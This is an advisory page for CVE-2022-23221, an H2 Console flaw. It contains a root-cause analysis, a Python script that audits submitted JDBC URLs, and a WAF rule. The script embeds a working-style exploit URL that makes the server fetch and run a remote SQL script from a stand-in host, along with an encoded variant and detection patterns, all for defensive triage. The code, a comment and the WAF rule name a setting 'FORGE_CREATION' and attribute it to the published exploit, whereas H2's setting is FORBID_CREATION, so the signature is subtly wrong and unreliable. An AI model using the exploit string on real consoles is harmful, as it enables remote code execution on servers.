
CVE-2022-23221: Arbitrary code execution in H2 Console

CVSS Score (v3.1): 9.8

Basic Information

EPSS Score: 0.96183%
Published: 1/21/2022
Updated: 8/18/2023
KEV Status: No
Technology: Java

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Package Name        Ecosystem   Vulnerable Versions   First Patched Version
com.h2database:h2   maven       < 2.1.210             2.1.210

Vulnerability Intelligence

Root Cause Analysis (Miggo AI)

The vulnerability stems from improper handling of JDBC URL parameters in the H2 Console. The console's login form lets an unauthenticated user submit the JDBC URL that WebServer.getConnection() then opens, so attacker-controlled settings reach the database engine unfiltered, including settings that switch off H2's own safety checks. ConnectionInfo.readSettingsFromURL() parses the ';'-separated KEY=VALUE settings and applies them, so an INIT=RUNSCRIPT setting makes the engine run an SQL script of the attacker's choosing (for example one fetched from a remote URL) on the server at connect time, which is what turns a database login into arbitrary code execution. The patch in 2.1.210 specifically addresses these areas (PR #3377), confirming their role in the exploit chain. The CWE-88 classification (argument injection) and the public PoC using INIT=RUNSCRIPT to load a remote SQL script further validate this analysis. Note that the console is only reachable from other hosts when it has been started with webAllowOthers (or an equivalent framework setting); a console bound to localhost is still exploitable by anyone who can reach that interface, such as through SSRF or another local foothold.
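To make the parsing step concrete, the following is an added example in Python (not H2's code and not part of the Miggo page). It models how H2 splits the text after `jdbc:h2:` into `;`-separated `KEY=VALUE` settings with case-insensitive keys, then audits a URL the way a console-side or WAF-side check would see it when it arrives percent-encoded from the login form. The splitter's handling of backslash-escaped `;` and the rejection of duplicate keys are assumptions about H2's parser; the sample URLs and the 203.0.113.10 address are constructed for the example.

```python
"""Audit H2 JDBC URLs submitted to the H2 Console for the CVE-2022-23221
pattern: settings that disable safety checks combined with INIT=RUNSCRIPT."""
import re
from urllib.parse import unquote

H2_PREFIX = "jdbc:h2:"

# Settings an unauthenticated console user should never be able to supply.
# INIT runs SQL at connect time; IGNORE_UNKNOWN_SETTINGS suppresses the error
# an unrecognised key would otherwise raise; FORGE_CREATION is the remaining
# key in the published exploit string and is listed so the full signature
# is caught even if the other two are renamed or split across requests.
DANGEROUS_SETTINGS = {"INIT", "IGNORE_UNKNOWN_SETTINGS", "FORGE_CREATION"}

RUNSCRIPT_RE = re.compile(r"\bRUNSCRIPT\b", re.IGNORECASE)
# RUNSCRIPT FROM '<url>' with a network scheme means the script is fetched
# from a host the attacker controls.
REMOTE_SRC_RE = re.compile(r"\bFROM\s+'(?:https?|ftp)://", re.IGNORECASE)


def split_settings(text):
    """Split on ';' while honouring backslash-escaped separators.
    Assumption: this mirrors how H2 splits the settings part of a URL, so an
    INIT value containing several statements can carry '\\;' between them."""
    parts, buf, i = [], [], 0
    while i < len(text):
        ch = text[i]
        if ch == "\\" and i + 1 < len(text):
            buf.append(text[i + 1])   # keep the escaped character literally
            i += 2
            continue
        if ch == ";":
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
        i += 1
    parts.append("".join(buf))
    return parts


def parse_h2_url(url):
    """Return (database_spec, settings) for an H2 JDBC URL.
    Keys are upper-cased so INIT, init and Init all map to the same setting."""
    if not url.lower().startswith(H2_PREFIX):
        raise ValueError("not an H2 JDBC URL: %r" % url)
    parts = split_settings(url[len(H2_PREFIX):])
    database, settings = parts[0], {}
    for item in parts[1:]:
        if not item:
            continue
        if "=" not in item:
            raise ValueError("malformed setting %r" % item)
        key, value = item.split("=", 1)
        key = key.strip().upper()
        if key in settings:
            raise ValueError("duplicate setting %r" % key)
        settings[key] = value
    return database, settings


def audit_console_url(raw_url):
    """Findings for a URL posted to the console login form (may be
    percent-encoded). An empty list means nothing matched."""
    database, settings = parse_h2_url(unquote(raw_url))
    findings = []
    for key in sorted(settings):
        if key in DANGEROUS_SETTINGS:
            findings.append("dangerous setting %s" % key)
    init = settings.get("INIT", "")
    if RUNSCRIPT_RE.search(init):
        findings.append("INIT executes RUNSCRIPT")
        if REMOTE_SRC_RE.search(init):
            findings.append("RUNSCRIPT loads script from remote URL")
    return findings


# Constructed sample submissions, not real traffic; 203.0.113.10 is a
# documentation (TEST-NET-3) address.
BENIGN_URL = "jdbc:h2:mem:testdb;DB_CLOSE_DELAY=-1"
EXPLOIT_URL = ("jdbc:h2:mem:x;IGNORE_UNKNOWN_SETTINGS=TRUE;FORGE_CREATION=FALSE;"
               "INIT=RUNSCRIPT FROM 'http://203.0.113.10/evil.sql'")
ENCODED_URL = ("jdbc%3Ah2%3Amem%3Ax%3BINIT%3DRUNSCRIPT%20FROM%20"
               "%27http%3A%2F%2F203.0.113.10%2Fa.sql%27")

if __name__ == "__main__":
    for sample in (BENIGN_URL, EXPLOIT_URL, ENCODED_URL):
        print(sample)
        print("  ->", audit_console_url(sample) or "clean")
```

The in-memory `mem:` prefix in the exploit string matters because such a database is created on demand, so the attacker needs no pre-existing database file for the connection (and the INIT script) to succeed. A console-side fix along these lines rejects any user-supplied URL whose settings contain INIT at all; the regexes only add context for triage.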


WAF Protection Rules

WAF Rule

H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORGE_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
